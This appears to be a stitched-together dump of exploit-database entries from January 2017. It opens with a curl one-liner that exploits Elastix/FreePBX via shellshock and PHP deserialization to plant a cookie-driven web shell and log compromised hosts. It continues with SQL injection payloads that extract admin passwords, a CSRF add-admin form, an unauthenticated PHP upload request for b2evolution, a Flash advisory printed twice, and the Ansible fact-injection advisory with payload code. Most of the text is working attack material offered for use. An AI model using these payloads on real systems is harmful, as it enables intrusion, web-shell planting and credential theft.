curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
# Vulnerability: Starting Page- SQL Injection
# Date: 10.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Tested on: win10
# Author: JaMbA
# Script link: http://software.friendsinwar.com/news.php?readmore=31
#########################
# SQL Injection/Exploit :
# Vulnerable Parametre : linkid
# http://localhost/[PATH]/outgoing.php?linkid=[SQL]
Tunisia 4 ever
# # # # #
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
<div id="add-admin-form">
<input type="hidden" name="action" value="add-admin" />
<label for="username">Username:</label>
<input type="text" id="username" name="admin-username" value="" />
<div class="spacer"></div>
<label for="password">Password:</label>
<input type="password" id="password" name="admin-password" value="" />
<div class="spacer"></div>
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
</div>
</form>
</body>
</html>
# # # # #
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41008.zip
####################################################################################
# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
# Date: 11-01-2017
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
# Exploit Author: Ben Lee
# Contact: benlee9@outlook.com
# Category: webapps
# Tested on: Win7
1. Description
The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
2. Vulnerable parameters:
'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'
3.Proof of Concept:
Url:http://www.example.com/StartingPage/link_req_2.php
Post data:
[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]
[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]
Best Regards!
Ben Lee
# Vulnerability: My link trader - SQL Injection
# Date: 11.01.2017
# Vendor Homepage:
http://software.friendsinwar.com/scripts_example/my_link_trader/
# Tested on: Kali Linux 2016.2
# Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#########################
#########################
# SQL Injection/POC :
# Vulnerable Parametre : id
# http://localhost/[PATH]/out.php?id=[SQL]
# Exploit Title: b2evolution6.8.2stable – Upload
# Date: 29/12/2016
# Exploit Author: Li Fei
# Vendor Homepage: http://b2evolution.net/
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
# Version: 6.8.2
# Tested on: win7 64bit
No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)
1-goto http://localhost/b2evolution/index.php/a/extended-post
2- click on Browse botton and select you`re file
3- click on upload
Ceshi.php path is:
http://SiteName/ceshi.php
poc url:
POST /b2evolution/htsrv/comment_post.php HTTP/1.1
Poc header:
Host: localhost
Content-Length: 1054
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
Referer: http://localhost/b2evolution/index.php/a/extended-post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
Connection: close
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_rating"
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="g"
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
Content-Type: application/octet-stream
<?php
eval("echo'hello world';");
?>
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="submit_comment_post_19[save]"
Send comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="crumb_comment"
dXuthsKjMjhG2dnhADtzzOW414qV6Qky
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_type"
comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_item_ID"
19
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="redirect_to"
http://localhost/b2evolution/index.php/a/extended-post
------WebKitFormBoundarytZ4hUYCjABZB7YSL—
Source: https://cosig.gouv.qc.ca/en/cosig-2017-01-en/
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 24.0.0.186 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: January 10, 2017
# CVE-2017-2930
# COSIG-2016-35
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created
on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio.
Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia
and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-11-13: Francis Provencher of COSIG report this vulnerability to Adobe PSIRT;
2016-11-14: Adobe PSIRT confirm this vulnerability;
2017-01-10: Adobe publish a patch (APSB17-02);
2017-01-10: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, an attacker is able to create an “out of bound” memory corruption. A file with an “ActionRecord”
structure that contain an invalid value in “ActionGetURL2” could lead to remote code execution in the context of the current user.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41012.zip
####################################################################################
########### Computest security advisory CT-2017-0109 #############
Summary: Command execution on Ansible controller from host
Affected software: Ansible
CVE: CVE-2016-9587
Reference URL: https://www.computest.nl/advisories/
CT-2017-0109_Ansible.txt
Affected versions: < 2.1.4, < 2.2.1
Credit: Undisclosed at Computest (research@computest.nl)
Date of publication: January 9, 2017
During a summary code review of Ansible, Computest found and exploited several
issues that allow a compromised host to execute commands on the Ansible
controller and thus gain access to the other hosts controlled by that
controller.
This was not a full audit and further issues may or may not be present.
About Ansible
-------------
"Ansible is an open-source automation engine that automates cloud provisioning,
configuration management, and application deployment. Once installed on a
control node, Ansible, which is an agentless architecture, connects to a managed
node through the default OpenSSH connection type."
- wikipedia.org
Technical Background
--------------------
A big threat to a configuration management system like Ansible, Puppet, Salt
Stack and others, is compromise of the central node. In Ansible terms this is
called the Controller. If the Controller is compromised, an attacker has
unfettered access to all hosts that are controlled by the Controller. As such,
in any deployment, the central node receives extra attention in terms of
security measures and isolation, and threats to this node are taken even more
seriously.
Fortunately for team blue, in the case of Ansible the attack surface of the
Controller is pretty small. Since Ansible is agent-less and based on push, the
Controller does not expose any services to hosts.
A very interesting bit of attack surface though is in the Facts. When Ansible
runs on a host, a JSON object with Facts is returned to the Controller. The
Controller uses these facts for various housekeeping purposes. Some facts have
special meaning, like the fact "ansible_python_interpreter" and
"ansible_connection". The former defines the command to be run when Ansible is
looking for the python interpreter, and the second determines the host Ansible
is running against. If an attacker is able to control the first fact he can
execute an arbitrary command, and if he is able to control the second fact he is
able to execute on an arbitrary (Ansible-controlled) host. This can be set to
"local" to execute on the Controller itself.
Because of this scenario, Ansible filters out certain facts when reading the
facts that a host returns. However, we have found 6 ways to bypass this filter.
In the scenarios below, we will use the following variables:
PAYLOAD = "touch /tmp/foobarbaz"
# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
# Note that it echoes an empty dictionary {} (it's not a format string).
'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
'ansible_connection': 'local',
# Become is usually enabled on the remote host, but on the Ansible
# controller it's likely password protected. Disable it to prevent
# password prompts.
'ansible_become': False,
}
Bypass #1: Adding a host
------------------------
Ansible allows modules to add hosts or update the inventory. This can be very
useful, for instance when the inventory needs to be retrieved from a IaaS
platform like as the AWS module does.
If we're lucky, we can guess the inventory_hostname, in which case the host_vars
are overwritten [2] and they will be in effect at the next task. If host_name
doesn't match inventory_hostname, it might get executed in the play for the next
hostgroup, also depending on the limits set on the commandline.
# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
# assume that host_name is the same as inventory_hostname
'host_name': socket.gethostname(),
'host_vars': INTERPRETER_FACTS,
}
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
Bypass #2: Conditionals
-----------------------
Ansible actions allow for conditionals. If we know the exact contents of a
"when" clause, and we register it as a fact, a special case checks whether the
"when" clause matches a variable [1]. In that case it replaces it with its
contents and evaluates [2] them.
# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
data['ansible_facts'][known_conditional] = LOOKUP
[1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
[2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
Bypass #3: Template injection in stat module
--------------------------------------------
The template module/action merges its results with those of the stat module.
This allows us to bypass [1][2][3] the stripping of magic variables from
ansible_facts [4], because they're at an unexpected location in the result tree.
data.update({
'stat': {
'exists': True,
'isdir': False,
'checksum': {
'rc': 0,
'ansible_facts': INTERPRETER_FACTS,
},
}
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
# [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
Bypass #4: Template injection by changing jinja syntax
------------------------------------------------------
Remote facts always get quoted. Set_fact unquotes them by evaluating them.
UnsafeProxy was designed to defend against unquoting by transforming jinja
syntax into jinja comments, effectively disabling injection.
Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
{{}} is needed to make it look like a variable [3]. This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD + "')]]",
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308
Bypass #5: Template injection in dict keys
------------------------------------------
Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
works against:
- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}
The prefix and/or suffix are needed in order to turn the
dict into a string, otherwise the value would remain a dict.
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
Bypass #6: Template injection using safe_eval
---------------------------------------------
There's a special case for evaluating strings that look like a list or dict [1].
Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
re-create a bit of Jinja template that is interpreted.
This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
Issue: Disabling verbosity
--------------------------
Verbosity can be set on the controller to get more debugging information. This
verbosity is controlled through a custom fact. A host however can overwrite this
fact and set the verbosity level to 0, hiding exploitation attempts.
data['_ansible_verbose_override'] = 0
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
Issue: Overwriting files
------------------------
Roles usually contain custom facts that are defined in defaults/main.yml,
intending to be overwritten by the inventory (with group and host vars). These
facts can be overwritten by the remote host, due to the variable precedence [1].
Some of these facts may be used to specify the location of a file that will be
copied to the remote host. The attacker may change it to /etc/passwd. The
opposite is also true, he may be able to overwrite files on the Controller. One
example is the usage of a password lookup with where the filename contains a
variable [2].
[1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
[2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup
Mitigation
----------
Computest is not aware of mitigations short of installing fixed versions of the
software.
Resolution
----------
Ansible has released new versions that fix the vulnerabilities described in
this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.
Conclusion
----------
The handling of Facts in Ansible suffers from too many special cases that allow
for the bypassing of filtering. We found these issues in just hours of code
review, which can be interpreted as a sign of very poor security. However, we
don't believe this is the case.
The attack surface of the Controller is very small, as it consists mainly of the
Facts. We believe that it is very well possible to solve the filtering and
quoting of Facts in a sound way, and that when this has been done, the
opportunity for attack in this threat model is very small.
Furthermore, the Ansible security team has been understanding and professional
in their communication around this issue, which is a good sign for the handling
of future issues.
Timeline
--------
2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team (secalert@redhat.com)
2016-12-09 Submitted PoC and description to security@ansible.com
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version